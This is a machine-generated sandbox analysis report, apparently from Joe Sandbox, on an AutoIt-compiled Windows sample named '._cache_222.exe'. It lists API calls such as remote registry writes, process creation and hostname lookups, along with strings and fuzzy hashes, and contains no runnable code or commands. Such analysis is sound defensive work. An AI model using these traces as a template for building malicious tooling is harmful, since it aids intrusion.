                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3964851224-0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2645101109-0
                                                                                                                                        APIs
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0076E279
                                                                                                                                        • timeGetTime.WINMM ref: 0076E51A
                                                                                                                                        • TranslateMessage.USER32(?), ref: 0076E646
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0076E651
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0076E664
                                                                                                                                        • LockWindowUpdate.USER32(00000000), ref: 0076E697
                                                                                                                                        • DestroyWindow.USER32 ref: 0076E6A3
                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0076E6BD
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 007D5B15
                                                                                                                                        • TranslateMessage.USER32(?), ref: 007D62AF
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 007D62BD
                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007D62D1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                        • API String ID: 2641332412-570651680
                                                                                                                                        • Opcode ID: 3a67d8777b4e3fde91e832e405d57fd795b897cbc15337c0a0ff1611cdcbb910
                                                                                                                                        • Instruction ID: f2e7244771e27098f4b01097e95f5521518d275e39d79be3ec562ae885e55c05
                                                                                                                                        • Opcode Fuzzy Hash: 3a67d8777b4e3fde91e832e405d57fd795b897cbc15337c0a0ff1611cdcbb910
                                                                                                                                        • Instruction Fuzzy Hash: A362C270504380DFDB24DF24C899BAA77E5BF44304F14896EFD4A8B292DB79D844CB62
                                                                                                                                        APIs
                                                                                                                                        • ___createFile.LIBCMT ref: 00796C73
                                                                                                                                        • ___createFile.LIBCMT ref: 00796CB4
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00796CDD
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00796CE4
                                                                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00796CF7
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00796D1A
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00796D23
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00796D2C
                                                                                                                                        • __set_osfhnd.LIBCMT ref: 00796D5C
                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00796DC6
                                                                                                                                        • __close_nolock.LIBCMT ref: 00796DEC
                                                                                                                                        • __chsize_nolock.LIBCMT ref: 00796E1C
                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00796E2E
                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00796F26
                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00796F3B
                                                                                                                                        • __close_nolock.LIBCMT ref: 00796F9B
                                                                                                                                          • Part of subcall function 0078F84C: CloseHandle.KERNEL32(00000000,0080EEC4,00000000,?,00796DF1,0080EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0078F89C
                                                                                                                                          • Part of subcall function 0078F84C: GetLastError.KERNEL32(?,00796DF1,0080EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0078F8A6
                                                                                                                                          • Part of subcall function 0078F84C: __free_osfhnd.LIBCMT ref: 0078F8B3
                                                                                                                                          • Part of subcall function 0078F84C: __dosmaperr.LIBCMT ref: 0078F8D5
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00796FBD
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007970F2
                                                                                                                                        • ___createFile.LIBCMT ref: 00797111
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0079711E
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00797125
                                                                                                                                        • __free_osfhnd.LIBCMT ref: 00797145
                                                                                                                                        • __invoke_watson.LIBCMT ref: 00797173
                                                                                                                                        • __wsopen_helper.LIBCMT ref: 0079718D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                        • String ID: 9Ax$@
                                                                                                                                        • API String ID: 3896587723-2490207084
                                                                                                                                        • Opcode ID: 08989e461d9380859dafbb9486d2e8adf6b926cef98e6029e40f54b1e717b055
                                                                                                                                        • Instruction ID: 23e78a396976c8d4ffaeb3be9a40d309e89b2bec4be84094a3b8d3ba461ee902
                                                                                                                                        • Opcode Fuzzy Hash: 08989e461d9380859dafbb9486d2e8adf6b926cef98e6029e40f54b1e717b055
                                                                                                                                        • Instruction Fuzzy Hash: AB222471A142059FEF299F68EC95BBE7B61FB00320F248329E521AB2D2D73D8D50DB51

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 007A76ED
                                                                                                                                        • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 007A7713
                                                                                                                                        • _wcscpy.LIBCMT ref: 007A7741
                                                                                                                                        • _wcscmp.LIBCMT ref: 007A774C
                                                                                                                                        • _wcscat.LIBCMT ref: 007A7762
                                                                                                                                        • _wcsstr.LIBCMT ref: 007A776D
                                                                                                                                        • 74D31560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007A7789
                                                                                                                                        • _wcscat.LIBCMT ref: 007A77D2
                                                                                                                                        • _wcscat.LIBCMT ref: 007A77D9
                                                                                                                                        • _wcsncpy.LIBCMT ref: 007A7804
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscat$FileInfoVersion$D31560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                        • API String ID: 1021613404-1459072770
                                                                                                                                        • Opcode ID: 9435c7725d6f5425229b18f75b8023e3f13b11c519fa215952cd0a383c4e8f4a
                                                                                                                                        • Instruction ID: 58aaa55d7e36e9d8a250b2d547309ae4d6b1763c6823cc412e7320c584ef66a1
                                                                                                                                        • Opcode Fuzzy Hash: 9435c7725d6f5425229b18f75b8023e3f13b11c519fa215952cd0a383c4e8f4a
                                                                                                                                        • Instruction Fuzzy Hash: 5E41C2B2A44204FEE705B7648C4FEBF77ACEF56720F100165F905E6192EB6CAA41C7A1

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • GetForegroundWindow.USER32 ref: 00761FBE
                                                                                                                                        • IsWindow.USER32(?), ref: 007D282E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Foreground_memmove
                                                                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                        • API String ID: 3828923867-1919597938
                                                                                                                                        • Opcode ID: effd5a120e488053982bd112d112e21385c1995f61338cfdb0f6b11cdc2d0c2a
                                                                                                                                        • Instruction ID: 4946c210fc10784bd2f2a543dbaa230ce6c8a2cf7a71c4af99300c4dfbcf3a1d
                                                                                                                                        • Opcode Fuzzy Hash: effd5a120e488053982bd112d112e21385c1995f61338cfdb0f6b11cdc2d0c2a
                                                                                                                                        • Instruction Fuzzy Hash: 41D10A30104702DBCB14EF10C484AA9BBB1FF64350F148A2EF456576A3DB38E99BDB92

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C3626
                                                                                                                                        • RegCreateKeyExW.KERNEL32(?,?,00000000,007FDBF0,00000000,?,00000000,?,?), ref: 007C3694
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007C36DC
                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007C3765
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 007C3A85
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C3A92
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                        • API String ID: 536824911-966354055

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_222.exe,00000104,?,00000000,00000001,00000000), ref: 0076428C
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                          • Part of subcall function 00781BC7: __wcsicmp_l.LIBCMT ref: 00781C50
                                                                                                                                        • _wcscpy.LIBCMT ref: 007643C0
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_222.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 007D214E
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_222.exe$CMDLINE$CMDLINERAW
                                                                                                                                        • API String ID: 861526374-4250834258

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0077EA39
                                                                                                                                        • __wsplitpath.LIBCMT ref: 0077EA56
                                                                                                                                          • Part of subcall function 0078297D: __wsplitpath_helper.LIBCMT ref: 007829BD
                                                                                                                                        • _wcsncat.LIBCMT ref: 0077EA69
                                                                                                                                        • __makepath.LIBCMT ref: 0077EA85
                                                                                                                                          • Part of subcall function 00782BFF: __wmakepath_s.LIBCMT ref: 00782C13
                                                                                                                                          • Part of subcall function 0078010A: std::exception::exception.LIBCMT ref: 0078013E
                                                                                                                                          • Part of subcall function 0078010A: __CxxThrowException@8.LIBCMT ref: 00780153
                                                                                                                                        • _wcscpy.LIBCMT ref: 0077EABE
                                                                                                                                          • Part of subcall function 0077EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0077EADA,?,?), ref: 0077EB27
                                                                                                                                        • _wcscat.LIBCMT ref: 007D32FC
                                                                                                                                        • _wcscat.LIBCMT ref: 007D3334
                                                                                                                                        • _wcsncpy.LIBCMT ref: 007D3370
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                        • String ID: '/z$Include$\
                                                                                                                                        • API String ID: 1213536620-3682632366

                                                                                                                                        Control-flow Graph

                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                        • API String ID: 208665112-3771769585

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 007630B0
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 007630BF
                                                                                                                                        • LoadIconW.USER32(00000063), ref: 007630D5
                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 007630E7
                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 007630F9
                                                                                                                                          • Part of subcall function 0076318A: LoadImageW.USER32(00760000,00000063,00000001,00000010,00000010,00000000), ref: 007631AE
                                                                                                                                        • RegisterClassExW.USER32(?), ref: 00763167
                                                                                                                                          • Part of subcall function 00762F58: GetSysColorBrush.USER32(0000000F), ref: 00762F8B
                                                                                                                                          • Part of subcall function 00762F58: RegisterClassExW.USER32(00000030), ref: 00762FB5
                                                                                                                                          • Part of subcall function 00762F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00762FC6
                                                                                                                                          • Part of subcall function 00762F58: LoadIconW.USER32(000000A9), ref: 00763009
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                        • API String ID: 2880975755-4155596026

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 007BB777
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 007BB7A4
                                                                                                                                        • CoUninitialize.COMBASE ref: 007BB7AE
                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 007BB8AE
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 007BB9DB
                                                                                                                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 007BBA0F
                                                                                                                                        • CoGetObject.OLE32(?,00000000,007ED91C,?), ref: 007BBA32
                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 007BBA45
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007BBAC5
                                                                                                                                        • VariantClear.OLEAUT32(007ED91C), ref: 007BBAD5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2395222682-0
                                                                                                                                        • Opcode ID: e3e652fa8b4c898e00011211030e1d726bdffb4c0035efe61ee02b1cc76866dc
                                                                                                                                        • Instruction ID: 0c7d6c3bb1974f6e469caca8629650f00fa1b2f7f08d3e9c8219d133ad9030bb
                                                                                                                                        • Opcode Fuzzy Hash: e3e652fa8b4c898e00011211030e1d726bdffb4c0035efe61ee02b1cc76866dc
                                                                                                                                        • Instruction Fuzzy Hash: 2AC11571604345EFC710DF68C884AAAB7E9FF89314F00491DF98A9B251DB75ED05CB92

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00762F8B
                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00762FB5
                                                                                                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00762FC6
                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00763009
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                        • API String ID: 975902462-1005189915
                                                                                                                                        • Opcode ID: 1389e997851a3e397f759cc7e29c022de1284fc88a08f5a714f4d4d80e4c6fca
                                                                                                                                        • Instruction ID: 3d0063198af1776df0d681979f0642ccc61722ca9906ba0448314266299b4370
                                                                                                                                        • Opcode Fuzzy Hash: 1389e997851a3e397f759cc7e29c022de1284fc88a08f5a714f4d4d80e4c6fca
                                                                                                                                        • Instruction Fuzzy Hash: 3221E4B5901348AFDF209F94E889BCDBBB4FB18700F10812AF615AA2A0D7B40545CF95

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007C23E6
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007C2579
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007C259D
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007C25DD
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007C25FF
                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007C2760
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007C2792
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007C27C1
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007C2838
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4090791747-0
                                                                                                                                        • Opcode ID: 835159bb75f39c864238c1c4bf402252477afc9be51c8f6d26457aa0084333fb
                                                                                                                                        • Instruction ID: cd228b3a3097aff5ec94d5e2121cdbb63273a4ffaa1ac7bf3fb65e0a4a2509c6
                                                                                                                                        • Opcode Fuzzy Hash: 835159bb75f39c864238c1c4bf402252477afc9be51c8f6d26457aa0084333fb
                                                                                                                                        • Instruction Fuzzy Hash: EED1E031604341DFCB15EF24C895F6ABBE5AF85320F14845DF98A9B2A2DB38DC42CB52

                                                                                                                                        Control-flow Graph

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                        • API String ID: 0-572801152
                                                                                                                                        • Opcode ID: 3e8503dbd2b428186515f81daf5b4288b083aee54731a2d1462c3e13779f5880
                                                                                                                                        • Instruction ID: 5d501bb5d6588d1a18eb4718e70d2efb2832347fe638c6ebbe3b5b3e96ea8c04
                                                                                                                                        • Opcode Fuzzy Hash: 3e8503dbd2b428186515f81daf5b4288b083aee54731a2d1462c3e13779f5880
                                                                                                                                        • Instruction Fuzzy Hash: 23E190B1A00219ABDF11DF64C885BEE77B9FF58354F14C029F945AB281D778AD41CBA0

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
